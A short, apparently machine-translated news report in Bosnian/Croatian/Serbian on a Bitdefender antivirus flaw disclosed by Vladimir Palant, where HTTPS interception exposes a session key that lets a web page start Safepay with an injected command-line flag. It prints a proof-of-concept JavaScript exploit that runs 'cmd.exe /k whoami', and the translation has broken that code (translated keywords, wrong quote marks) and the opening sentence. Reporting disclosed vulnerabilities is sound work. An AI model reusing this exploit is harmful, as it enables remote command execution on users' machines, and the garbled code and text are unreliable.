Vladimir Palant, kreator Adblock Plus,
Uzrok problema je taj što Bitdefender antivirus obavlja lokalno presretanje HTTPS prometa zamjenom originalnog TLS certifikata stranice. Na sistemu klijenta je instaliran dodatni root sertifikat, koji omogućava sakrivanje rada korišćenog sistema saobraćajne inspekcije. Antivirus se uglavljuje u zaštićeni promet i ubacuje vlastiti JavaScript kod u neke stranice kako bi implementirao funkciju sigurnog pretraživanja, a u slučaju problema sa certifikatom sigurne veze, vraćenu stranicu greške zamjenjuje svojom. Budući da se nova stranica s greškom poslužuje u ime servera koji se otvara, druge stranice na tom poslužitelju imaju puni pristup sadržaju koji je umetnuo Bitdefender.
Prilikom otvaranja stranice koju kontrolira napadač, ta stranica može poslati XMLHttpRequest i glumiti probleme s HTTPS certifikatom prilikom odgovaranja, što će dovesti do vraćanja stranice s greškom koju je lažirao Bitdefender. Budući da se stranica s greškom otvara u kontekstu domene napadača, on može čitati sadržaj lažirane stranice s Bitdefender parametrima. Stranica koju pruža Bitdefender također sadrži ključ sesije koji vam omogućava korištenje internog Bitdefender API-ja za pokretanje zasebne sesije Safepay preglednika, navodeći proizvoljne oznake komandne linije i pokretanje bilo koje sistemske naredbe koristeći “--utility-cmd-prefix” zastava. Primjer eksploatacije (param1 i param2 su vrijednosti dobijene sa stranice greške):
var zahtjev = novi XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Podsjetimo, istraživanje sprovedeno 2017
Samo 11 od 26 proizvoda pruža trenutne pakete šifri. 5 sistema nije potvrdilo sertifikate (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Proizvodi Kaspersky Internet Security i Total Security bili su predmet napada
izvor: opennet.ru